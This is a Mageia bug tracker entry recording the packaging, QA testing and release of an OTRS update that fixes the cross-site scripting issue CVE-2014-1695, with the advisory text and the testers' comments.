12910 – otrs new security issue CVE-2014-1695

Bug 12910 - otrs new security issue CVE-2014-1695

Summary: otrs new security issue CVE-2014-1695

Status:	RESOLVED FIXED

Alias:	None

Product:	Mageia
Classification:	Unclassified
Component:	Security (show other bugs)
Version:	4
Hardware:	i586 Linux

Priority:	Normal Severity: normal
Target Milestone:	---
Assignee:	QA Team
QA Contact:	Sec team

URL:	http://lwn.net/Vulnerabilities/589096/
Whiteboard:	MGA3TOO MGA4-32-OK MGA4-64-OK MGA3-32...
Keywords:	validated_update

Depends on:
Blocks:

Reported:	2014-03-01 22:01 CET by David Walser
Modified:	2014-03-03 19:10 CET (History)
CC List:	3 users (show)

See Also:
Source RPM:	otrs-3.2.14-1.mga4.src.rpm
CVE:
Status comment:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Description David Walser 2014-03-01 22:01:13 CET

Upstream has issued an advisory on February 25:
https://www.otrs.com/security-advisory-2014-03-xss-issue/

The issue is fixed upstream in 3.2.15.

Updated packages uploaded for Mageia 3, Mageia 4, and Cauldron.

Advisory:
========================

Updated otrs package fixes security vulnerability:

An attacker could send a specially prepared HTML email to OTRS. If he can then
trick an agent into following a special link to display this email, JavaScript
code would be executed (CVE-2014-1695).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1695
https://www.otrs.com/security-advisory-2014-03-xss-issue/
http://www.otrs.com/release-notes-otrs-help-desk-3-2-15/
========================

Updated packages in core/updates_testing:
========================
otrs-3.2.15-1.mga3
otrs-3.2.15-1.mga4

from SRPMS:
otrs-3.2.15-1.mga3.src.rpm
otrs-3.2.15-1.mga4.src.rpm

Reproducible: 

Steps to Reproduce:

David Walser 2014-03-01 22:01:23 CET

Version: Cauldron => 4
Whiteboard: (none) => MGA3TOO

Comment 1 Marc Lattemann 2014-03-02 19:43:44 CET

did not found how to check this vulnerability...

tested general installation of otrs on MGA4 32bit:
- installed version from core and run installer
- log into otrs
- update installed version from update-testing
- log into update orts 
--> no errors detected
- delete existing database
- re-run installer to install updated version
- log into otrs
--> no errors detected

update tested successfully in MGA4 32bit

CC: (none) => marc.lattemann
Whiteboard: MGA3TOO => MGA3TOO MGA4-32-OK

Comment 2 Marc Lattemann 2014-03-02 20:10:15 CET

update tested successfully in MGA4 64bit based on comment #1

Whiteboard: MGA3TOO MGA4-32-OK => MGA3TOO MGA4-32-OK MGA4-64-OK

Comment 3 Marc Lattemann 2014-03-02 21:04:13 CET

update tested successfully in MGA3 32bit

Comment 4 Marc Lattemann 2014-03-02 21:30:13 CET

update tested successfully in MGA3 64bit.

If tests above are sufficient, than advisory can be uploaded and validated.

Whiteboard: MGA3TOO MGA4-32-OK MGA4-64-OK => MGA3TOO MGA4-32-OK MGA4-64-OK MGA3-32-OK MGA-64-OK

Marc Lattemann 2014-03-02 21:30:54 CET

Whiteboard: MGA3TOO MGA4-32-OK MGA4-64-OK MGA3-32-OK MGA-64-OK => MGA3TOO MGA4-32-OK MGA4-64-OK MGA3-32-OK MGA3-64-OK

Comment 5 Thomas Backlund 2014-03-02 21:38:07 CET

advisory uploaded, validating.

Keywords: (none) => validated_update
Whiteboard: MGA3TOO MGA4-32-OK MGA4-64-OK MGA3-32-OK MGA3-64-OK => MGA3TOO MGA4-32-OK MGA4-64-OK MGA3-32-OK MGA3-64-OK advisory
CC: (none) => tmb, sysadmin-bugs

Comment 6 Thomas Backlund 2014-03-02 22:01:41 CET

Update pushed:
http://advisories.mageia.org/MGASA-2014-0114.html

Status: NEW => RESOLVED
Resolution: (none) => FIXED

David Walser 2014-03-03 19:10:37 CET

URL: (none) => http://lwn.net/Vulnerabilities/589096/

Note You need to log in before you can comment on or make changes to this bug.